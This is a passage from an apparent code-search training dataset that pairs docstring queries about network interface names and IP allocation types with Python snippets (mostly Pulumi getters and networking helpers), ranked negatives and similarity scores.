"0.43714467",
"0.43712446",
"0.43700236",
"0.43652645",
"0.4364992",
"0.43638447",
"0.43628988",
"0.43578696",
"0.43512228",
"0.434911",
"0.4344968",
"0.4344335",
"0.43391272",
"0.43386632",
"0.43386632"
] | 0.0 | -1 |
The default interface name for this L3 network in the virtual machine. This name can be overridden by the name supplied in the network attachment configuration of that virtual machine. | def interface_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "interface_name") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def interface_name(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"interface_name\")",
"def l3_network_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"l3_network_name\")",
"def interface_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"interface_name\")",
"def network_interface_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_interface_id\")",
"def get_interface_name():\n interface_name = ''\n interfaces = psutil.net_if_addrs()\n for name, details in interfaces.items():\n for detail in details:\n if detail.family == socket.AF_INET:\n ip_address = ipaddress.ip_address(detail.address)\n if not (ip_address.is_link_local or ip_address.is_loopback):\n interface_name = name\n break\n return interface_name",
"def _get_interface_name(self):\n return self.__interface_name",
"def getDefaultLayerName(self):\n\t\treturn self._fileSystem.getDefaultLayerName()",
"def _get_ifname(self, intf_type, interface):\n if intf_type == 'port':\n ifname = 'Ethernet' + str(interface)\n elif intf_type == 'portchannel':\n ifname = 'po' + str(interface)\n else:\n raise Exception(\"Unknown interface type: \" + intf_type)\n\n return ifname",
"def get_logical_ifname(self, interface_name, proto='provision'): # pragma: no cover\n output = check_output(['uci', 'show', 'network'])\n network_list = output.strip().split('\\n')\n for config in network_list:\n cfg, option = config.split('=')\n net_prex = cfg.split(\".\")\n if net_prex[-1] == \"proto\" and str(option) != proto:\n ifname = '.'.join(net_prex[:-1]) + '.ifname'\n interface = check_output(['uci', 'get', ifname]).split('\\n')[0]\n if interface == interface_name:\n return net_prex[1]\n return ''",
"def get_default_config(self):\n if not self.iface_type:\n return None\n\n defaults = {}\n defaults['description'] = self.interface_name + ' Interface'\n defaults['admin'] = 'up'\n if self.is_ethernet:\n defaults['speed'] = 'auto'\n defaults['duplex'] = 'auto'\n defaults['type'] = 'bridged'\n elif self.iface_type == 'Bridge-Aggregation':\n defaults['type'] = 'bridged'\n else:\n defaults['type'] = 'routed'\n\n return defaults",
"def get_interface_name(self, network, port=None):\n if not port:\n device_id = self.get_device_id(network)\n port = self.plugin.get_dhcp_port(network.id, device_id)\n return self.driver.get_device_name(port)",
"def getDefaultName(self): # real signature unknown; restored from __doc__\n pass",
"def network_interface(self): \n return self._network_interface",
"def default_ip(ifname):\n ipr = IPRoute()\n index = ipr.link_lookup(ifname=ifname)[0]\n addr = ipr.get_addr(index=index)[0]\n interface = ipaddress.ip_interface('{}/{}'.format(addr.get_attr('IFA_ADDRESS'), addr['prefixlen']))\n addr = interface.ip + 1\n if addr in interface.network:\n return str(addr)\n raise TypeError(f'Unable to calculate default node ip in {ifname} ({interface})')",
"def moc_vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"moc_vnet_name\")",
"def managed_network_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"managed_network_name\")",
"def GetInterface(self):\n ifname = self.interface_watcher.get_last_ifname()\n if ifname is None:\n ifname = ''\n logger.debug('Replying \"' + ifname + '\" to D-Bus request GetInterface')\n return ifname",
"def get_default_ip():\r\n if CONFIG.BIND_INTERFACE is None:\r\n default_gw = netifaces.gateways()['default']\r\n if netifaces.AF_INET in default_gw:\r\n preferred_interface = default_gw[netifaces.AF_INET][1]\r\n else:\r\n interfaces = netifaces.interfaces()\r\n preferred_interface = next((i for i in interfaces if i != 'lo'), interfaces[0])\r\n else:\r\n preferred_interface = CONFIG.BIND_INTERFACE\r\n return netifaces.ifaddresses(preferred_interface)[netifaces.AF_INET][0]['addr']",
"def get_default_iface_name_linux():\n route = \"/proc/net/route\"\n with open(route) as f:\n for line in f.readlines():\n try:\n iface, dest, _, flags, _, _, _, _, _, _, _, = line.strip().split()\n if dest != '00000000' or not int(flags, 16) & 2:\n continue\n return iface\n except:\n continue",
"def cloud_services_network_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cloud_services_network_name\")",
"def get_network_name(self): # type: () -> str\n networks = self.get_network_names()\n\n if not networks:\n raise ApplicationError('No network found for Docker container: %s.' % self.id)\n\n if len(networks) > 1:\n raise ApplicationError('Found multiple networks for Docker container %s instead of only one: %s' % (self.id, ', '.join(networks)))\n\n return networks[0]",
"def default_name(self):\n return '[' + self.__class__.__name__ + ']'",
"def computer_network_name(self) -> str:\n return self._computer_network_name",
"def network(self) -> str:\n return pulumi.get(self, \"network\")",
"def interviewer_name_default(self, interviewer_name_default):\n\n self._interviewer_name_default = interviewer_name_default",
"def default_name(self):\n name = f\"Player {self.UID.split('-')[0]}\"\n return name",
"def vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"vnet_name\")",
"def get_network_default_gateway(self):\n return self.mycam.devicemgmt.GetNetworkDefaultGateway()",
"def get_name(self):\n \n return 'Socket/IP'",
"def network_watcher_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_watcher_name\")",
"def network_name(self, **kwargs):\n\n return self.api_request(self._get_method_fullname(\"network_name\"), kwargs)",
"def get_interface(self, ifname):\n \n return self._ifname",
"def network(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network\")",
"def get_default_ip_address():\r\n gws = netifaces.gateways() # get all gateways\r\n default = gws['default'] # get the default gw\r\n adapter = default[2][1] # get the adapter identifier\r\n realadapter = netifaces.ifaddresses(adapter) # get the adapter\r\n addr_dict = realadapter[2][0] # get the first ipv4 address tuple\r\n return addr_dict['addr']",
"def name(self) -> str:\n return self.config_name or self.host_name or self.dev_id or DEVICE_DEFAULT_NAME",
"def vnet_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"vnet_name\")",
"def get_network_name_on_vc(options):\n network = get_network_on_vc(options)\n if network:\n return network.name",
"def default_interface(dut,**kwargs):\n cli_type = st.get_ui_type(dut, **kwargs)\n\n if 'interface' not in kwargs:\n st.error(\"Mandatory arg interface is not present\")\n return False\n else:\n interface = kwargs['interface']\n\n skip_error = kwargs.pop('skip_error', False)\n command = ''\n\n if cli_type == 'klish':\n if 'range' in kwargs:\n command = command + \"\\n\" + \"default interface range {}\".format(interface)\n else:\n command = command + \"\\n\" + \"default interface {}\".format(interface)\n else:\n st.error(\"Invalid cli_type for this API - {}.\".format(cli_type))\n return False\n\n st.config(dut, command, type='klish',skip_error_check=skip_error)\n return True",
"def network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_id\")",
"def name(self):\n if self._name == '':\n return self.default_name\n else:\n return self._name",
"def name(self) -> str:\n return f\"{self._inst} NAT {self._data['name']}\"",
"def test_get_default_network(self):\n pass",
"def get_interface(\n network: Union[ipaddress.IPv6Interface, ipaddress.IPv4Interface, str], index: int\n) -> Union[ipaddress.IPv6Interface, ipaddress.IPv4Interface]:\n if isinstance(network, str):\n network = ipaddress.ip_network(network)\n\n host = network[index]\n return ipaddress.ip_interface(f\"{host}/{network.prefixlen}\")",
"def default_label(self) -> str:\n return self.settings[\"default_label\"]",
"def attached_network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"attached_network_id\")",
"def GetWirelessInterface(self):\n return str(self.wifi.wireless_interface)",
"def vnet_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"vnet_name\")",
"def get_interface_name(self, device, ipaddress, parser_obj=None):\n\n # Calling parser\n try:\n parsed_output = parser_obj.parse(ip=ipaddress)\n except SchemaEmptyParserError:\n # We are looping over all the ips provided in the testbed yaml file\n # Show command output will be empty in some cases.\n return None\n\n # Get the corresponding interface name\n for intf in parsed_output['interface'].keys():\n # Parser structure only has one interface\n interface_name = intf\n\n return interface_name",
"def set_interface(interface, name=''):\n if not interface:\n raise ValueError('interface is empty')\n\n global interfaces\n logger.debug('connection_name: \"{}\" -> {}.{}'.format(\n name,\n interface.__module__,\n interface.__class__.__name__\n ))\n interfaces[name] = interface",
"def get_default_vnchost_name(self):\n\t\treturn call_sdk_function('PrlDispCfg_GetDefaultVNCHostName', self.handle)",
"def network_fabric_controller_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_fabric_controller_name\")",
"def convert_interface_name(self, s):\n match = self.rx_interface_name.match(s)\n if not match:\n return s\n else:\n return \"DryContact %s\" % s",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def filename(self):\n return f'{self._peer.interface}.conf'",
"def name(self):\n # self._name = \"wyzeapi_\"+self._device_mac+\"_\"+ self._name\n return self._device.nickname",
"def nw_name(self):\n return self._nw_name",
"def _iface_type(self, if_name):\n\n if if_name.lower().startswith('gi'):\n if_type = 'GigabitEthernet'\n elif if_name.lower().startswith('ten'):\n if_type = 'Ten-GigabitEthernet'\n elif if_name.lower().startswith('fo'):\n if_type = 'FortyGigE'\n elif if_name.lower().startswith('vl'):\n if_type = 'Vlan-interface'\n elif if_name.lower().startswith('lo'):\n if_type = 'LoopBack'\n elif if_name.lower().startswith('br'):\n if_type = 'Bridge-Aggregation'\n elif if_name.lower().startswith('ro'):\n if_type = 'Route-Aggregation'\n elif if_name.lower().startswith('tu'):\n if_type = 'Tunnel'\n elif if_name.lower().startswith('tw'):\n if_type = 'TwentyGigE'\n elif if_name.lower().startswith('hu'):\n if_type = 'HundredGigE'\n else:\n if_type = None\n\n number_list = if_name.split(' ')\n if len(number_list) == 2:\n number = number_list[-1].strip()\n else:\n number = self._get_number(if_name)\n\n if if_type:\n proper_interface = if_type + number\n else:\n proper_interface = if_name\n\n return proper_interface, if_type",
"def renameIface(self, station, nextWlan, iface):\n iface = iface[:-1]\n station.cmd('ip link set dev %s name %s-wlan%s' % (iface, station, nextWlan))\n station.cmd('ifconfig %s-wlan%s up' % (station, nextWlan))",
"def Name(self, default=None):\n return self.data.get('name', default)",
"def default_namespace(self) -> Optional[str]:\n return self.schema.namespaces.get('')",
"def get_network_name(options):\n user = pwd.getpwuid(os.getuid())[0]\n return \"%s-%s\" %(user, options.name)",
"def default_docker_pull_conn_name(self) -> str:\n return self._default_docker_pull_conn_name",
"def get_network(self) -> Optional[str]:\n return self.get_value(self._network_attribute)",
"def __str__(self):\n \n return self.net.ifconfig()",
"def interface(self):\n\n data = ['[Interface]']\n for item in INTERFACE_KEYS:\n value = getattr(self, item, None)\n if value:\n data.append(value)\n\n return '''\n'''.join(data)",
"def name(self):\n if self._name is None:\n return(self.default_name)\n else:\n return(self._name)",
"def name(self):\n if self.resource.is_client:\n return f\"{self.network.name} {self.resource.name_connection_type} {SWITCH_TYPES[self.variable][0]}\"\n elif self.resource.is_eero or self.resource.is_profile:\n return f\"{self.network.name} {self.resource.name} {SWITCH_TYPES[self.variable][0]}\"\n return f\"{self.resource.name} {SWITCH_TYPES[self.variable][0]}\"",
"def _set_interface_name(self, v, load=False):\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1][0-6]))/([1-9]|[1-9][0-9]|[1-9][0-9][0-9])(:[1-4])?)', 'length': [u'3..16']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..512']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4090']}),], is_leaf=True, yang_name=\"interface-name\", rest_name=\"interface-name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions={u'tailf-common': {u'info': u'The Interface value.'}}, namespace='urn:brocade.com:mgmt:brocade-fcoe-ext', defining_module='brocade-fcoe-ext', yang_type='union', is_config=True)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"interface_name must be of a type compatible with union\"\"\",\n 'defined-type': \"brocade-fcoe-ext:union\",\n 'generated-type': \"\"\"YANGDynClass(base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1][0-6]))/([1-9]|[1-9][0-9]|[1-9][0-9][0-9])(:[1-4])?)', 'length': [u'3..16']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..512']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4090']}),], is_leaf=True, yang_name=\"interface-name\", rest_name=\"interface-name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions={u'tailf-common': {u'info': u'The Interface value.'}}, namespace='urn:brocade.com:mgmt:brocade-fcoe-ext', defining_module='brocade-fcoe-ext', yang_type='union', is_config=True)\"\"\",\n })\n\n self.__interface_name = t\n if hasattr(self, '_set'):\n self._set()",
"def network(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"network\")",
"def name(self):\n return self._imu.IMUName()",
"def setDefaultNS(self, ns):\n self.default_ns = ns",
"def _get_ifname(self):\n return self.__ifname",
"def GetDefaultWiredNetwork(self):\n config = ConfigParser.ConfigParser()\n config.read(self.wired_conf)\n profileList = config.sections()\n for profile in profileList:\n if config.has_option(profile, \"default\"):\n if misc.to_bool(config.get(profile, \"default\")):\n return profile\n return None",
"def get_name():\n\n return 'nettools'",
"def get_default_namespace(self):\n return None",
"def name(self) -> str:\n return self._alias or f\"Nut-{self._host}\"",
"def get_ipv4_defaultgw(self):\n \n ipv4_defaultgw = self._dhcp_client_ctrl.getIpv4DefaultGateway()\n if ipv4_defaultgw is None:\n return None\n else:\n return unicode(ipv4_defaultgw)",
"def layer_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"layer_name\")",
"def create_default_network(context):\n return [{\n 'type': 'templates/network.py',\n 'name': 'fc-network',\n 'properties': {\n 'resourceName': 'network',\n 'name': 'network',\n 'projectId': '$(ref.fc-project.projectId)',\n 'autoCreateSubnetworks': True,\n # We pass the dependsOn list into the network template as a\n # parameter. Deployment Manager doesn't support dependsOn for\n # template-call nodes, so we can't have this resource itself depend on\n # the project-wide resources.\n 'dependsOn': '$(ref.fc-project.resourceNames)',\n },\n }]",
"def default_docker_pull_conn_name(self, default_docker_pull_conn_name: str):\n\n self._default_docker_pull_conn_name = default_docker_pull_conn_name",
"def LegacyName(self, default=None):\n return self.data.get('legacy_name', default)",
"def virtual_network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_id\")",
"def default_prefix(self) -> str:\n return \"\"",
"def default_prefix(self) -> str:\n return \"\"",
"def DetectWirelessInterface(self):\n iface = self.wifi.DetectWirelessInterface()\n if iface:\n print 'Automatically detected wireless interface ' + iface\n else:\n print \"Couldn't detect a wireless interface.\"\n return str(iface)",
"def iface_config(self, iface, *args, **kwargs):\n if not set(kwargs).issubset({'intf_ip_addr', 'netns', 'adminMode'}):\n raise NotImplementedError(\"Method is not implemented for current kwargs.\")\n if kwargs.get('netns', False):\n # Create network namespaces for current iface\n self.create_namespaces(iface)\n del kwargs['netns']\n if 'intf_ip_addr' in kwargs:\n kwargs['ipAddr'] = \"{}/24\".format(kwargs['intf_ip_addr'])\n if iface in self.namespaces:\n self._lhost.ui.enter_namespace(self.namespaces[iface])\n self._lhost.ui.modify_ports([iface], **kwargs)\n if iface in self.namespaces:\n self._lhost.ui.exit_namespace()",
"def guess_nic_name(self, nic_number):\n if nic_number == 1:\n return \"mgmt0\"\n else:\n return (\"Ethernet{0}/{1}\".format((nic_number - 2) // 48 + 2,\n (nic_number - 2) % 48 + 1))",
"def identity(self, default=\"\"):\n for prop in (\"standard_name\", \"grid_mapping_name\"):\n n = self.coordinate_conversion.get_parameter(prop, None)\n if n is not None:\n return f\"{prop}:{n}\"\n\n n = self.nc_get_variable(None)\n if n is not None:\n return f\"ncvar%{n}\"\n\n return default",
"def fortran_interface(self) -> str:\n return ''",
"def get_default(self, create=True):\n if self._default_network is None and create:\n log.debug(\"Creating default network...\")\n self._default_network = self.create('default', driver='bridge')\n\n return self._default_network",
"def interface(self):\n if self._interface is None:\n expression = expressions.WPA_INTERFACE\n name = expressions.INTERFACE_NAME\n command = self.interface_list_command\n self._interface = self._match(expression,\n name,\n command)\n return self._interface",
"def GetCurrentNetwork(self, iwconfig=None):\n current_network = str(self.wifi.GetCurrentNetwork(iwconfig))\n return current_network",
"def default_endpoint(self) -> str:\n return self.settings[\"default_endpoint\"]",
"def computer_network_name(self, computer_network_name: str):\n self._computer_network_name = computer_network_name",
"def subnetwork_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnetwork_name\")",
"def get_network(self):\n return self.get_ip_network()[-1]",
"def core_network_attachment_arn(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"core_network_attachment_arn\")",
"def layer_protocol_name(self) -> str:\n return self._layer_protocol_name"
] | [
"0.67701626",
"0.6730182",
"0.6579234",
"0.65378875",
"0.6346248",
"0.6293956",
"0.6253151",
"0.61782867",
"0.61560553",
"0.61084664",
"0.61054385",
"0.605106",
"0.59554195",
"0.59140545",
"0.5869591",
"0.58683455",
"0.58659315",
"0.5836901",
"0.5836809",
"0.5832016",
"0.582706",
"0.5820547",
"0.58059514",
"0.57857776",
"0.5777015",
"0.5722368",
"0.56486154",
"0.56398",
"0.56388086",
"0.56309706",
"0.56188774",
"0.55941486",
"0.5585376",
"0.5584135",
"0.5573169",
"0.5568992",
"0.553016",
"0.5501065",
"0.5497813",
"0.5496514",
"0.5491262",
"0.5480237",
"0.5476509",
"0.54581296",
"0.5441399",
"0.5439598",
"0.5422692",
"0.54218435",
"0.5406662",
"0.54003525",
"0.534749",
"0.5341064",
"0.53408533",
"0.53408533",
"0.53408533",
"0.53286207",
"0.5307978",
"0.53065",
"0.5304049",
"0.5286672",
"0.52833635",
"0.5270581",
"0.5269512",
"0.52598",
"0.5257598",
"0.52566457",
"0.5251153",
"0.52488893",
"0.5247088",
"0.5246333",
"0.5245039",
"0.52386594",
"0.5222346",
"0.522123",
"0.5213628",
"0.5212103",
"0.5206684",
"0.5197107",
"0.5179337",
"0.5178683",
"0.5175608",
"0.5168769",
"0.51683",
"0.5157992",
"0.5155772",
"0.5155772",
"0.514913",
"0.5148497",
"0.514717",
"0.5144888",
"0.513803",
"0.5127121",
"0.5126366",
"0.51253945",
"0.5109184",
"0.5100679",
"0.50949115",
"0.50894976",
"0.5085655",
"0.5073304"
] | 0.684074 | 0 |
The type of the IP address allocation, defaulted to "DualStack". | def ip_allocation_type(self) -> Optional[pulumi.Input[Union[str, 'IpAllocationType']]]:
return pulumi.get(self, "ip_allocation_type") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def ip_allocation_type(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ip_allocation_type\")",
"def _get_address_type(self):\n return self.__address_type",
"def get_ip_type1(self) -> str:\n hex_ip = hexlify(self.message)[152:160]\n ip_addr = int(hex_ip[6:8] + hex_ip[4:6] + hex_ip[2:4] + hex_ip[0:2], 16)\n return inet_ntoa(pack(\"<L\", ip_addr))",
"def address_type(self) -> str:\n return pulumi.get(self, \"address_type\")",
"def get_ip_type2(self) -> str:\n hex_ip = hexlify(self.message)[154:162]\n ip_addr = int(hex_ip[0:2] + hex_ip[2:4] + hex_ip[4:6] + hex_ip[6:8], 16)\n return inet_ntoa(pack(\">L\", ip_addr))",
"def ip_type(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ip_type\")",
"def ip_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_type\")",
"def address_type(self):\n return addresser.AddressSpace.PROPOSALS",
"def type(self):\n return BipType.get_at(self.ea)",
"def get_network_type(self):\n net_type = self._data['type']\n if net_type == 'Shared':\n return 'guest'\n elif net_type == 'Isolated':\n return 'isolated'",
"def allocate_subnet(self):\n if len(self.subnet_list) == 0:\n subnet = '192.168.1.0/24'\n self.subnet_list.append(subnet)\n return subnet\n else:\n subnet = self.subnet_list[::-1][0]\n ip = ipaddress.IPv4Network(subnet)[0]\n s = ipaddress.IPv4Address(ip) + 256\n return '{}{}'.format(s, '/24')",
"def test_external_ip_get_kind(self):\n assert_equal(self.test_external_ip.get_kind(), 'mpexternalip')",
"def AddrType(self) -> AddrTypes:\n return self.m_addr_type",
"def get_network_type(self):\n\t\treturn call_sdk_function('PrlVirtNet_GetNetworkType', self.handle)",
"def SocketType(self) -> SocketType:",
"def ip_protocol(self) -> str:\n protocol = f\"ipv{self.ip_address.version}\"\n\n log.debug(\"Host %s: IP protocol for paramiko is %s.\", self.host)\n return protocol",
"def get_type(self):\n types = dict(ADDRESS_TYPE_CHOICES)\n return types.get(self.address_type, \"N/A\")",
"def _address_type(self, address):\n parsed_type = None\n parsed = urlparse.urlparse(address)\n if parsed.scheme not in ('http', 'https', 'ipc', 'tcp'):\n raise ValueError('Invalid volttron central address.')\n\n return parsed.scheme",
"def outside_ip_address_type(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"outside_ip_address_type\")",
"def get_ip_version(network):\r\n if netaddr.IPNetwork(network).version == 6:\r\n return \"IPv6\"\r\n elif netaddr.IPNetwork(network).version == 4:\r\n return \"IPv4\"",
"def _get_network_type(self):\n return collections.namedtuple('hyper_dqn_network',\n ['hyp_q_value', 'q_values'])",
"def __ip_protocol(self, proto_num):\n if proto_num in self.protocols:\n return self.protocols[proto_num]\n return str(proto_num)",
"def ip_allocation_method(self) -> pulumi.Input[Union[str, 'VirtualMachineIPAllocationMethod']]:\n return pulumi.get(self, \"ip_allocation_method\")",
"def get_ip_version(network):\n if netaddr.IPNetwork(network).version == 6:\n return \"IPv6\"\n elif netaddr.IPNetwork(network).version == 4:\n return \"IPv4\"",
"def address(self):\n \n return self.__ip",
"def ip_protocol(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ip_protocol\")",
"def outside_ip_address_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"outside_ip_address_type\")",
"def outside_ip_address_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"outside_ip_address_type\")",
"def ip_protocol(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"ip_protocol\")",
"def pkt_type(self):\n return uint16_packer.unpack(self[32:34])[0]",
"def get_net_adapter_type(self):\n\t\treturn call_sdk_function('PrlSrvCfgNet_GetNetAdapterType', self.handle)",
"def is_ip(self) -> bool:\n return self.typ == ETH_P_IP",
"def getnetwork(ipaddr):\n return '192.168.1.0/24'",
"def get_name(self):\n \n return 'Socket/IP'",
"def _read_proto_resolve(self, addr: 'bytes', ptype: 'int') -> 'str | IPv4Address | IPv6Address':\n if ptype == Enum_EtherType.Internet_Protocol_version_4: # IPv4\n return ipaddress.ip_address(addr)\n if ptype == Enum_EtherType.Internet_Protocol_version_6: # IPv6\n return ipaddress.ip_address(addr)\n return addr.hex()",
"def getTransportType(self):\n if type(self.segment) is TcpSegment:\n return TCP_ID\n elif type(self.segment) is UdpSegment:\n return UDP_ID\n else:\n raise Exception(\"Unexpected type of transport protocol!\")",
"def _make_proto_resolve(self, addr: 'IPv4Address | IPv6Address | str | bytes', ptype: 'int') -> 'bytes':\n if ptype == Enum_EtherType.Internet_Protocol_version_4:\n return ipaddress.IPv4Address(addr).packed\n if ptype == Enum_EtherType.Internet_Protocol_version_6:\n return ipaddress.IPv6Address(addr).packed\n\n if isinstance(addr, str):\n return addr.encode()\n if isinstance(addr, (ipaddress.IPv4Address, ipaddress.IPv6Address)):\n return addr.packed\n return addr",
"def type(self):\n return self.sock.type",
"def ip_protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_protocol\")",
"def get_ip(self):",
"def pack_ip(self, str_ip):\n return struct.pack(\">BBBB\", *[ int(c) for c in str_ip.split(\".\") ])",
"def getAddress(self) -> int:\n ...",
"def AioMessageTypeToIpAddressString(message_type):\n ip = network_config.AioMessageTypeToIpAddress(message_type)\n return '%d.%d.%d.%d' % (ip.a, ip.b, ip.c, ip.d)",
"def get_packet_type(cls, type_):\n if type_ <= ether.ETH_TYPE_IEEE802_3:\n type_ = ether.ETH_TYPE_IEEE802_3\n return cls._TYPES.get(type_)",
"def __init__(self):\n self.id = None\n self.typeInfo['id'] = 'string'\n \"\"\"availability of the network offering\"\"\"\n self.availability = None\n self.typeInfo['availability'] = 'string'\n \"\"\"true if network offering is ip conserve mode enabled\"\"\"\n self.conservemode = None\n self.typeInfo['conservemode'] = 'boolean'\n \"\"\"the date this network offering was created\"\"\"\n self.created = None\n self.typeInfo['created'] = 'date'\n \"\"\"additional key/value details tied with network offering\"\"\"\n self.details = None\n self.typeInfo['details'] = 'map'\n \"\"\"an alternate display text of the network offering.\"\"\"\n self.displaytext = None\n self.typeInfo['displaytext'] = 'string'\n \"\"\"true if guest network default egress policy is allow; false if default egress policy is deny\"\"\"\n self.egressdefaultpolicy = None\n self.typeInfo['egressdefaultpolicy'] = 'boolean'\n \"\"\"true if network offering can be used by VPC networks only\"\"\"\n self.forvpc = None\n self.typeInfo['forvpc'] = 'boolean'\n \"\"\"guest type of the network offering, can be Shared or Isolated\"\"\"\n self.guestiptype = None\n self.typeInfo['guestiptype'] = 'string'\n \"\"\"true if network offering is default, false otherwise\"\"\"\n self.isdefault = None\n self.typeInfo['isdefault'] = 'boolean'\n \"\"\"true if network offering supports persistent networks, false otherwise\"\"\"\n self.ispersistent = None\n self.typeInfo['ispersistent'] = 'boolean'\n \"\"\"maximum number of concurrents connections to be handled by lb\"\"\"\n self.maxconnections = None\n self.typeInfo['maxconnections'] = 'integer'\n \"\"\"the name of the network offering\"\"\"\n self.name = None\n self.typeInfo['name'] = 'string'\n \"\"\"data transfer rate in megabits per second allowed.\"\"\"\n self.networkrate = None\n self.typeInfo['networkrate'] = 'integer'\n \"\"\"the ID of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingid = None\n self.typeInfo['secondaryserviceofferingid'] = 'string'\n \"\"\"the name of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingname = None\n self.typeInfo['secondaryserviceofferingname'] = 'string'\n \"\"\"the ID of the service offering used by virtual router provider\"\"\"\n self.serviceofferingid = None\n self.typeInfo['serviceofferingid'] = 'string'\n \"\"\"the name of the service offering used by virtual router provider\"\"\"\n self.serviceofferingname = None\n self.typeInfo['serviceofferingname'] = 'string'\n \"\"\"true if network offering supports specifying ip ranges, false otherwise\"\"\"\n self.specifyipranges = None\n self.typeInfo['specifyipranges'] = 'boolean'\n \"\"\"true if network offering supports vlans, false otherwise\"\"\"\n self.specifyvlan = None\n self.typeInfo['specifyvlan'] = 'boolean'\n \"\"\"state of the network offering. Can be Disabled/Enabled/Inactive\"\"\"\n self.state = None\n self.typeInfo['state'] = 'string'\n \"\"\"true if network offering supports network that span multiple zones\"\"\"\n self.supportsstrechedl2subnet = None\n self.typeInfo['supportsstrechedl2subnet'] = 'boolean'\n \"\"\"the tags for the network offering\"\"\"\n self.tags = None\n self.typeInfo['tags'] = 'string'\n \"\"\"the traffic type for the network offering, supported types are Public, Management, Control, Guest, Vlan or Storage.\"\"\"\n self.traffictype = None\n self.typeInfo['traffictype'] = 'string'\n \"\"\"the list of supported services\"\"\"\n self.service = []",
"def ip_info():\n return str(getIP())",
"def block_override_dns_type(self) -> str:\n return pulumi.get(self, \"block_override_dns_type\")",
"def IpNetwork(address, version=None):\n\n if version:\n if version == 4:\n return Ipv4Network(address)\n elif version == 6:\n return Ipv6Network(address)\n\n try:\n return Ipv4Network(address)\n except (ValueError):\n pass\n\n try:\n return Ipv6Network(address)\n except (ValueError):\n pass\n\n raise ValueError('%r does not appear to be an IPv4 or IPv6 network' % address)",
"def source_type(self):\n return SOURCE_TYPE_ROUTER",
"def source_type(self):\n return SOURCE_TYPE_ROUTER",
"def address(self):\n return f\"{self._type}.{self._id}\"",
"def get_allocated_address(\n self, config: ActorPoolConfig, allocated: allocated_type\n ) -> str:",
"def OSSupportsIPv4(self) -> bool:",
"def make(self, *,\n htype: 'Enum_Hardware | StdlibEnum | AenumEnum | str | int' = Enum_Hardware.Ethernet,\n htype_default: 'Optional[int]' = None,\n htype_namespace: 'Optional[dict[str, int] | dict[int, str] | Type[StdlibEnum] | Type[AenumEnum]]' = None, # pylint: disable=line-too-long\n htype_reversed: 'bool' = False,\n ptype: 'Enum_EtherType | StdlibEnum | AenumEnum | str | int' = Enum_EtherType.Internet_Protocol_version_4,\n ptype_default: 'Optional[int]' = None,\n ptype_namespace: 'Optional[dict[str, int] | dict[int, str] | Type[StdlibEnum] | Type[AenumEnum]]' = None, # pylint: disable=line-too-long\n ptype_reversed: 'bool' = False,\n hlen: 'int' = 6,\n plen: 'int' = 4,\n oper: 'Enum_Operation | StdlibEnum | AenumEnum | str | int' = Enum_Operation.REQUEST,\n oper_default: 'Optional[int]' = None,\n oper_namespace: 'Optional[dict[str, int] | dict[int, str] | Type[StdlibEnum] | Type[AenumEnum]]' = None, # pylint: disable=line-too-long\n oper_reversed: 'bool' = False,\n sha: 'str | bytes | bytearray' = '00:00:00:00:00:00',\n spa: 'IPv4Address | IPv6Address | str | bytes | bytearray' = '0.0.0.0', # nosec: B104\n 